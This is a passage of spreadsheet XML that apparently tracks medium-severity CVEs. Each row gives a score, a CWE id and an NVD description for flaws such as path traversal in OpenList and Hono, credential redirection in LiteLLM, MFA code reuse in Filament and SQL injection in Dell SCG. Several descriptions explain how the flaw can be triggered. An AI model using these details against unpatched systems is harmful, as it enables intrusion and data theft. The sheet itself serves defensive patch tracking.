      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr"/>
      <c r="Q726" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R726" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read/write vulnerability in the MessageParser::parseECSSTCHeader component of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted CAN message.</t>
        </is>
      </c>
      <c r="S726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75370</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75466</t>
        </is>
      </c>
      <c r="D727" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E727" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F727" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr"/>
      <c r="Q727" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="R727" s="5" t="inlineStr">
        <is>
          <t>libjpeg-turbo 3.2.0 contains an integer division-by-zero vulnerability in the PNG loader. When processing a valid indexed-color PNG image with a non-gray palette through tj3LoadImage12() or tj3LoadImage16() using the default pixel format, the application may trigger a division-by-zero in alloc_sarray(), causing a SIGFPE and denial of service.</t>
        </is>
      </c>
      <c r="S727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75466</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75509</t>
        </is>
      </c>
      <c r="D728" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E728" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F728" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr"/>
      <c r="Q728" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="R728" s="5" t="inlineStr">
        <is>
          <t>joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. Prior to version 1.7.3, JWTClaimsRegistry applies membership matching to list-valued iss and sub claims, allowing an array-valued iss that contains the expected issuer to pass an intended equality check and enabling issuer-validation bypass. This issue is fixed in version 1.7.3.</t>
        </is>
      </c>
      <c r="S728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75509</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75602</t>
        </is>
      </c>
      <c r="D729" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E729" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F729" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr"/>
      <c r="Q729" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R729" s="5" t="inlineStr">
        <is>
          <t>OpenList a file list program that supports multiple storage. Prior to 4.2.3, OpenList's offline-download feature at POST /api/fs/add_offline_download with tool: "SimpleHttp" accepts an attacker-supplied URL and saves its bytes under a per-task temporary directory before transferring them to the user's destination storage. The temporary filename comes from the attacker-controlled Content-Disposition header, is passed from parseFilenameFromContentDisposition in internal/offline_download/http/util.go to filepath.Join(task.TempDir, filename) in SimpleHttp.Run in internal/offline_download/http/client.go, and is opened with os.Create without a containment check. Because filepath.Join cleans .. segments, a non-admin user with PermAddOfflineDownload on any path can traverse out of task.TempDir and create, truncate, or overwrite any file writable by the OpenList process whose parent directory already exists. The server/handles/offline_download.go AddOfflineDownload route uses normal user authentication rather than AuthAdmin, and local-storage destinations fall through tryPutUrl in internal/offline_download/tool/add.go to the vulnerable SimpleHttp.Run path. This issue is fixed in version 4.2.3.</t>
        </is>
      </c>
      <c r="S729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75602</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75861</t>
        </is>
      </c>
      <c r="D730" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E730" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F730" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr"/>
      <c r="Q730" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R730" s="5" t="inlineStr">
        <is>
          <t>The Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 does not verify that the user redeeming a gift card is its intended recipient, allowing any authenticated user, such as a subscriber, to redeem gift cards belonging to other users, zeroing their balance and crediting the value to themselves.
In 3.2.9 an ownership check was added on one of the two affected redemption paths; the one that remains requires a companion Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 from the same vendor to be active.</t>
        </is>
      </c>
      <c r="S730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75861</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78481</t>
        </is>
      </c>
      <c r="D731" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E731" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F731" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr"/>
      <c r="Q731" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R731" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78481</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79513</t>
        </is>
      </c>
      <c r="D732" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E732" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F732" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr">
        <is>
          <t>gpac:gpac</t>
        </is>
      </c>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr"/>
      <c r="Q732" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="R732" s="5" t="inlineStr">
        <is>
          <t>A divide-by-zero vulnerability in the gf_dash_get_timeline_duration function (src/media_tools/dash_client.c) of GPAC v26.07.0 allows attackers to cause a Denial of Service (DoS) via a crafted MPD SegmentTimeline. Fixed in 2fd5a06ab226767900fd86edb5a1e8bfc1010640.</t>
        </is>
      </c>
      <c r="S732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79513</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79514</t>
        </is>
      </c>
      <c r="D733" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E733" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr">
        <is>
          <t>gpac:gpac</t>
        </is>
      </c>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr"/>
      <c r="Q733" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R733" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the gf_dm_data_received function (downloader.c) of GPAC v26.07.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted HTTP request. Fixed in 2fd5a06ab226767900fd86edb5a1e8bfc1010640.</t>
        </is>
      </c>
      <c r="S733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79514</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79522</t>
        </is>
      </c>
      <c r="D734" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E734" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr">
        <is>
          <t>gpac:gpac</t>
        </is>
      </c>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr"/>
      <c r="Q734" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R734" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the gf_dm_get_chunk_data function (src/utils/downloader.c) of GPAC v26.07.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted HTTP request. Fixed in 2fd5a06ab226767900fd86edb5a1e8bfc1010640.</t>
        </is>
      </c>
      <c r="S734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79522</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79728</t>
        </is>
      </c>
      <c r="D735" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E735" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F735" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr"/>
      <c r="Q735" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R735" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="S735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79728</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80128</t>
        </is>
      </c>
      <c r="D736" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E736" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr"/>
      <c r="Q736" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R736" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Authentication vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80128</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80177</t>
        </is>
      </c>
      <c r="D737" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E737" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F737" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr"/>
      <c r="Q737" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R737" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80177</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84306</t>
        </is>
      </c>
      <c r="D738" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E738" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F738" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr"/>
      <c r="Q738" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R738" s="5" t="inlineStr">
        <is>
          <t>Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.12.6 and 5.7.6, packages/panels/src/Auth/MultiFactor/App/AppAuthentication.php uses AppAuthentication::verifyCode() with a used-code cache key derived from both the app authentication secret and the submitted TOTP code. This isolates the newest accepted timestep by code instead of by secret, allowing a previously issued app-based MFA code to be accepted after a newer code has already been used. Reuse of the exact same code was already prevented, but another code inside the accepted time window remained usable. An attacker who obtains the target account's password and one app-based MFA code can use that code for the remainder of the configured window, which is approximately four minutes with the default settings, even after the legitimate account holder logs in with a newer code. Email-based MFA is not affected. This issue is fixed in versions 4.12.6 and 5.7.6.</t>
        </is>
      </c>
      <c r="S738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84306</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84365</t>
        </is>
      </c>
      <c r="D739" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E739" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F739" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr"/>
      <c r="Q739" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R739" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 4.12.12 until 4.13.5, the fix released for CVE-2026-39408 does not cover every traversal sequence, and toSSG() can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments. Static site generation builds each output path from the route path and values supplied through ssgParams, then verifies that the result stays inside the output directory using the same normalization routine that built the path. That routine does not fully collapse runs of consecutive parent-directory segments, allowing a path that the check accepts to resolve outside the output directory, and the check also treats output directories that differ in how they are rooted as equivalent. This arises when an application generates a static site from route parameter values it does not fully control, such as slugs from a CMS, API, or user submission. An untrusted ssgParams value can create or overwrite files elsewhere in the build environment and alter generated artifacts or deployment output. The vulnerability affects build-time static site generation only; request-time routing and applications with entirely developer-controlled ssgParams values are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="S739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84377</t>
        </is>
      </c>
      <c r="D740" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E740" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F740" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr"/>
      <c r="Q740" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R740" s="5" t="inlineStr">
        <is>
          <t>LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. Prior to versions 1.88.6 and 1.96.2, any authenticated LiteLLM proxy user could redirect an outbound provider call to a destination the user controls and cause the proxy to send its configured provider credentials to that destination. Request validation in litellm/proxy/auth/auth_utils.py, litellm/proxy/common_request_processing.py, litellm/proxy/health_endpoints/_health_endpoints.py, litellm/proxy/image_endpoints/endpoints.py, and litellm/proxy/litellm_pre_call_utils.py used incomplete checks that did not cover every sensitive parameter or inspect equivalent values across nested request fields, path values, and bracket-notation form data. Routing and credential parameters including api_base, base_url, model_list, fallbacks, and litellm_credential_name could therefore be applied without clearing the operator's stored key, exposing upstream provider credentials and other configured secrets and permitting server-side requests to internal services reachable by the proxy. This issue is fixed in versions 1.88.6 and 1.96.2.</t>
        </is>
      </c>
      <c r="S740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84377</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85117</t>
        </is>
      </c>
      <c r="D741" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E741" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F741" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr"/>
      <c r="Q741" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R741" s="5" t="inlineStr">
        <is>
          <t>The Contact Form 7 Captcha WordPress plugin before 0.1.9 runs the shortcode parser over the whole rendered Contact Form 7 form, including the values a visitor submitted, allowing unauthenticated users to execute arbitrary shortcodes registered on the site.</t>
        </is>
      </c>
      <c r="S741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85117</t>
        </is>
